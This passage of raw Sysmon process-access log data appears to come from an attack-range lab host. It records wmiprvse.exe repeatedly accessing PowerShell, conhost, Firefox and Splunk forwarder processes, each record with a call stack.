Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150241Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150240Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150239Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150238Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150237Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150236Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150235Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150234Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150233Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150232Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150231Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150230Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150229Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150228Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150227Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150226Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150225Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150224Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150223Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150222Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150221Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150220Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150219Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150218Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.654{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL